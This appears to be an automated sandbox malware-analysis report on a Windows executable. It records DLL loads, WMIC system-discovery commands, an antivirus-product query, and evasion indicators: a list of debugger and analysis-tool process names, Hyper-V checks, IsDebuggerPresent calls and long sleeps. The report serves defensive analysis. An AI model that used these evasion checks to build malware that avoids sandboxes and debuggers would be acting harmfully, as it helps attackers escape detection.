Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32

Jump to behavior

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Code function: 0_2_00EE15A0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00EE15A0

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EF587C push esi; mov dword ptr [esp], 00F0C140h	0_2_00EF573B
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EF4CD7 push edx; mov dword ptr [esp], eax	0_2_00EF5486
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EF4CD7 push ecx; mov dword ptr [esp], eax	0_2_00EF5493
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EF60C9 push esi; mov dword ptr [esp], 00F0C140h	0_2_00EF573B
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE6029 push edx; mov dword ptr [esp], edi	0_2_00EE604A
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE6029 push edi; mov dword ptr [esp], 00F0C140h	0_2_00EE6078
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE4831 push edx; mov dword ptr [esp], 00F0C140h	0_2_00EE4869
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE6150 push eax; mov dword ptr [esp], 00F0C140h	0_2_00EE617F
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00F14273 push esp; ret	0_2_00F1427A
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEAA69 push ecx; mov dword ptr [esp], 00000000h	0_2_00EEAC11
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEAA69 push eax; mov dword ptr [esp], edi	0_2_00EEAC5A
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EF63DF push esi; mov dword ptr [esp], 00F0C140h	0_2_00EF573B
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00F1031B push D1DD3004h; retf	0_2_00F10320
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00F13B03 pushad ; ret	0_2_00F13B0A
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00F144F1 push es; ret	0_2_00F144F4
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE74EF push eax; mov dword ptr [esp], 00F0C140h	0_2_00EE7521
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00F13CB0 push ecx; ret	0_2_00F13CDA
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EF65BC push esi; mov dword ptr [esp], 00F0C140h	0_2_00EF573B
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE754B push eax; mov dword ptr [esp], 00F0C140h	0_2_00EE7588
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00F13D39 push edi; ret	0_2_00F13D44
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00F1252F push edx; ret	0_2_00F12536
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEA508 push edx; mov dword ptr [esp], 00F0C140h	0_2_00EEA555
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEBD1C push ebx; mov dword ptr [esp], 00F0C140h	0_2_00EEBD5A
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEA6B5 push eax; mov dword ptr [esp], 00F0C140h	0_2_00EEA6EB
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00F1469A push ecx; ret	0_2_00F1469B
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE6FB3 push eax; mov dword ptr [esp], 00F0C140h	0_2_00EE6FF5
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEBF56 push ebx; mov dword ptr [esp], 00F0C140h	0_2_00EEBF84
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE6F34 push eax; mov dword ptr [esp], 00F0C140h	0_2_00EE6F85

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: REGMON.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXEPE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: IMPORTREC.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROC_ANALYZER.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SNIFF_HIT.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: IDAQ.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXEX
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe TID: 3496	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe TID: 3156	Thread sleep count: 186 > 30	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe TID: 3156	Thread sleep time: -5580000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe TID: 6184	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000154E000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2672949046.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.0000000001593000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879838672.00000000015AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2672949046.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.0000000001593000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879838672.00000000015AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep

graph_0-20388

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Code function: 0_2_00EF587C Sleep,IsDebuggerPresent,

0_2_00EF587C

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Code function: 0_2_00EE15A0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00EE15A0

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00F028AE RemoveVectoredExceptionHandler,AddVectoredExceptionHandler,RtlAddVectoredExceptionHandler,TlsGetValue,CloseHandle,CloseHandle,TlsSetValue,CloseHandle,CloseHandle,TlsSetValue,CloseHandle,	0_2_00F028AE
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE1148 GetStartupInfoA,_amsg_exit,_initterm,SetUnhandledExceptionFilter,__p__acmdln,__initenv,exit,_cexit,	0_2_00EE1148
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE1189 _amsg_exit,_initterm,SetUnhandledExceptionFilter,__p__acmdln,__initenv,exit,_cexit,	0_2_00EE1189
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE1207 _initterm,_initterm,SetUnhandledExceptionFilter,__p__acmdln,__initenv,exit,_cexit,	0_2_00EE1207

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic os get Name	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic cpu get name	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Code function: 0_2_00EF4227 CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CreateFileW,GetLastError,CreateFileW,GetLastError,

0_2_00EF4227

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Code function: 0_2_00F05168 GetSystemTimeAsFileTime,

0_2_00F05168

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procmon.exe
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: tcpview.exe
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: lordpe.exe
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: autoruns.exe
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ollydbg.exe
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: regmon.exe

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : SELECT displayName FROM AntiVirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
